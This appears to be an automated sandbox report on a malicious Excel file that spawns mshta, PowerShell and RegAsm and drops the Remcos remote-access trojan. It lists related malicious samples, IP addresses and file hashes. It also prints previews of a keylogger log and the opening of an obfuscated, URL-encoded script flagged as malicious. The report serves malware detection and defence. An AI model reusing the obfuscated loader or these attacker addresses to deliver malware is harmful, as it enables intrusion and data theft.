Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: QPS-36477.xls
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/45@8/6
EGA Information:
• Successful, ratio: 77.8%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 185
• Number of non-executed functions: 325
Cookbook Comments:
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to French - France
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Override analysis time to 68125.6515850551 for current running targets taking high CPU consumption
• Override analysis time to 136251.30317011 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 2988 because there are no executed function
• Execution Graph export aborted for target mshta.exe, PID 3764 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: QPS-36477.xls
Time | Type | Description
09:23:40 | API Interceptor | 110x Sleep call for process: mshta.exe modified
09:23:44 | API Interceptor | 621x Sleep call for process: powershell.exe modified
09:23:52 | API Interceptor | 33x Sleep call for process: wscript.exe modified
09:24:01 | API Interceptor | 4952983x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                    LYqMgahOY0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                                    Iw7mPc6fCG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                    • 104.26.12.205
                                                                                                                                                                                                                    UyvVIyj7Ga.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 162.159.136.232
                                                                                                                                                                                                                    Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                    • 104.21.53.8
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    05af1f5ca1b87cc9cc9b25185115607dordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    PO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    7dcce5b76c8b17472d024758970a406bordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):384
                                                                                                                                                                                                                    Entropy (8bit):3.621581422343861
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:6lJ8wc5YcIeeDAlkY0ovTM4ywZ90ySNosb3fxNa/WAv:6lJ2ecj0l4v7Q350/W+
                                                                                                                                                                                                                    MD5:4A87E5701E4F6415624680855792B5DC
                                                                                                                                                                                                                    SHA1:ABA1147A055BCD1F11092BD53BC4877723D9E43C
                                                                                                                                                                                                                    SHA-256:482512C6DCE88A94767786E44EA589050256E1469CFCA9191C0B27D62C5EA124
                                                                                                                                                                                                                    SHA-512:3451B19DDB398E8FDA854DCFC1684B7E1E38305A6E4A155A7E78BD20804D780B186612B9EC70E292599305912E459799A3AC2A1DC9C24D2704294F29B849F4EE
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                                                    Preview:....[.2.0.2.4./.1.0./.0.8. .0.9.:.2.4.:.0.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.h.t.t.p.s.:././.w.r.a.t.h...m.e./.E.h.Y.y.k.L.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .Q.P.S.-.3.6.4.7.7. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].....[.C.t.r.l.L.].....[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):15189
                                                                                                                                                                                                                    Entropy (8bit):5.0343247648743
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:+WciDaVjvowSVOdBzVoGIpN6KQkj2/RWSJiQ0HzAFC:+WJaVjvowSVOdBzV3IpNBQkj2/RWSJid
                                                                                                                                                                                                                    MD5:ED1DC217B7C4FD47161AE1BE8E57C288
                                                                                                                                                                                                                    SHA1:018D8DF5F1C16D39D84F2BE8401727F9594EF530
                                                                                                                                                                                                                    SHA-256:7F93D4BD3BCA78ECDBC61EA0FF4C50214B3AA8879D39B6793E9E4B512D9614DB
                                                                                                                                                                                                                    SHA-512:CA8D3B5E3A35998A72DFE5C766197FC52856DC535C15117146150177A3CA97F0B13F6DABDEC9B050C871D7AE7CDC08F501690F079CC054ACBBB4AFF2B8659977
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:@...e...........................................................
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):120801
                                                                                                                                                                                                                    Entropy (8bit):2.548131261547014
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:Ea+M7+XoPsV9oPpF/4Ow5qouNREOX8MlV5BYoPItl8AT:Ea+Q+XoPsPoPX/4J54E3cqoPi9T
                                                                                                                                                                                                                    MD5:02DB2924D9D28415909466FD83D98BFB
                                                                                                                                                                                                                    SHA1:131F37687D5F92227DBF8DB85537D8D588BA4C67
                                                                                                                                                                                                                    SHA-256:63460BD959DB60A47DE9DFBC64C58ABD983AF187B29D7732987928C56A83A2E1
                                                                                                                                                                                                                    SHA-512:7B7BEC8C6F697B048D87E2AF22E704CAF7A2C05FDB1331E99D13D5BAF0F5C625CF574D16C596D2DBB000B829BDB752437801C8BB833ED7E62DD1AE3F4C14D9F5
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CsCrIpt%252520tyPe%25253D%252522tExT/VbSCRiPt%252522%25253E%25250AdiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):195560
                                                                                                                                                                                                                    Entropy (8bit):3.7210597034966684
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3072:kXvVPVWplSFblsHb6LBgt5poGwNqmM5pfir3RkQ5Pxl5Ax3pTgROVnjRv:qVPVWpy5sHGXqj2Z5Luh9eOVjRv
                                                                                                                                                                                                                    MD5:FFA76C6571F4F3D4E5E256586A8390B6
                                                                                                                                                                                                                    SHA1:00854060B1673D298068AAF9248129EFE750EB93
                                                                                                                                                                                                                    SHA-256:9E97607E9FB8CA4C56D9754B0A6D3FCD24B9816DC62DE63BE73869B17E5E8B24
                                                                                                                                                                                                                    SHA-512:ADC073AEE0AA3C6C7F6BF08606D616BF64F7ECBFA9A095361185DF8D041998505D044306AF933482F11DC6D5D484154954CB315AC8E767DAD19094F9BDDB2C2A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .p.l.a.t.i.r.r.o.s.t.r.o.(.a.r.g.i.l.l.i.t.a.,. .s.o.c.r.a.t.i.c.a.m.e.n.t.e.,. .e.s.f.e.n.o.i.d.e.,. .g.a.l.l.i.n.h.e.i.r.a.,. .a.l.a.b.a.r.d.i.n.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . .
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                                                    Entropy (8bit):5.013811273052389
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                                    MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                                                                                                                                                                    SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                                                                                                                                                                    SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                                                                                                                                                                    SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2342852
                                                                                                                                                                                                                    Entropy (8bit):2.6417290025884554
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                                                                                                    MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                                                                                                    SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                                                                                                    SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                                                                                                    SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):76472
                                                                                                                                                                                                                    Entropy (8bit):3.025081600163608
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:luYYST5PIYfLe2b52XPl6hAJC00EddMdf0Ii90Z5xxr8sdEdeC:4igYfqg52XPl6hAJC0irRHC
                                                                                                                                                                                                                    MD5:A4B79FF3D7725F69AB98C49A72805D64
                                                                                                                                                                                                                    SHA1:8617AF425CE74F816B2CE28FF7BF08A7F5317030
                                                                                                                                                                                                                    SHA-256:2DE8B86E62DE48780D92E82B3132F559DF0324A000F9BAFC8CAF3D2789D17CE5
                                                                                                                                                                                                                    SHA-512:3B7E25DBDFDAD51FFD8DB140091405FABD3242704C0FD0517CEB10C59E5AF57098CA41C3DCA9F9E80045D8A75EE8415927467457E636EA475C0BE95063C94C49
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):884312
                                                                                                                                                                                                                    Entropy (8bit):1.2944965349348616
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                                                                                                                                                                                                    MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                                                                                                                                                                                                    SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                                                                                                                                                                                                    SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                                                                                                                                                                                                    SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):8084
                                                                                                                                                                                                                    Entropy (8bit):2.570503528684488
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:j+RiOO++Z397Q2Acgze0xBdEQzBfCC7Boff8oBJ6ANQ4HJV:jt7ecgKgvzBArH
                                                                                                                                                                                                                    MD5:A0D51FBAA34316A0B3E02FA2B5BEA0B8
                                                                                                                                                                                                                    SHA1:01B3F570EFCA831762B154AC65E11C122319D35D
                                                                                                                                                                                                                    SHA-256:BC55995ADDDFBE0105BDACE8E1603EA7E9DA698C0BDC7E91F043578BF6B28157
                                                                                                                                                                                                                    SHA-512:93E08DF7E102CCD3D9077284E1E80369A21BA86B9194B72528BB140ABA83E65E7E2DC59471E2484AE805AF1C13E41C6A5273150E2EFAB06CABFA21BC889405E5
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):38272
                                                                                                                                                                                                                    Entropy (8bit):2.8200425031385645
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:6/UjPGlVrhaHoq7x0ii1lild6rMT54GtXU+j9hMQmlC+a6gz5nCf5OBgJP+SKA:6/1MH61lq4GtXJMQmlC+a6gz5SOyJ1/
                                                                                                                                                                                                                    MD5:C898CDC91D0BD5EFB41E576B8A19E931
                                                                                                                                                                                                                    SHA1:B9ED5CAC5A526CF8095AB8F8CE36C39F78422407
                                                                                                                                                                                                                    SHA-256:044E7012311B28991E687A081E1AC94B7D7EB80F1BE1970F519E949D01A05CA2
                                                                                                                                                                                                                    SHA-512:6BCD700AAB23B2205E8294C3071158CA42D4BA6B4B098CA6B511A386FF2E1F8D6B6A3BED4F307475F03161F96425194DEA5581411D3544E95F6D17BCD3264019
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:23:47 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1328
                                                                                                                                                                                                                    Entropy (8bit):4.001653622469839
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:Hbe9E2U6FQXdH2wKdNWI+ycuZhNjakSlPNnqSqd:PJ1Kd41ulja3/qSK
                                                                                                                                                                                                                    MD5:71643CF761D7FB83465D624C6203CB27
                                                                                                                                                                                                                    SHA1:7FEC9F87AE24BA35235BD0957AD5C1C75D105796
                                                                                                                                                                                                                    SHA-256:9E97171FCC476A7F394252E8CFE830DAEB43BECD36801FDC99E4170ECA61CC18
                                                                                                                                                                                                                    SHA-512:6F5F96E853DDFC711AB54A8C76A77D3A974B22BA5FB320FC0E17D8C8381866B1ABB44E822C1C08C9CCCF1C669E1C3D8DFE08A5E8FE841AFC5C9E4A7BB8E91C3D
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:L...c2.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP...............u..'.Z.<..7@............4.......C:\Users\user\AppData\Local\Temp\RES3ED5.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.v.r.r.k.y.h.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
